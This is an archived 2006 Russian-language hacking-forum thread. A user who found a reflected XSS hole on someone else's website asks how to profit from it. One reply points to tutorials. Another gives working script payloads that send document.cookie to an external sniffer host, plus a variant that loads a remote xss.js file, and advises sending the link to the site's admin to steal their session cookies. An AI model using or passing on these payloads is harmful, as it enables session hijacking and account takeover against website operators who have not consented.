Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Помогите разобраться с Xss (https://forum.antichat.xyz/showthread.php?t=14924)

LoFFi 23.02.2006 18:47
Помогите разобраться с Xss
 
Я вот тут нашел сайт левенький, и через некоторое время нашел дыру XSS

http://www.......ru/news/index.php?param=1<h1>XSS</h1>

Только вот подскажите что я с этого теперь могу поиметь и как.

Electro 23.02.2006 20:40
С начало читаем...

http://antichat.ru/crackchat/HTML/

http://antichat.ru/sniff/

Потом смотрим видео

http://video.antichat.net/1_0.html

Azazel 23.02.2006 20:51
Это пассивный XSS. Можешь вписать туда <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> если не фильтруются какие-либо спец символы. Если фильтруются можешь сделать так <script src=http://твой сайт/xss.js></script>Где в xss.js записано img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; И дать эту ссылку админу. Если он лопух, получишь его куки.


Время: 04:08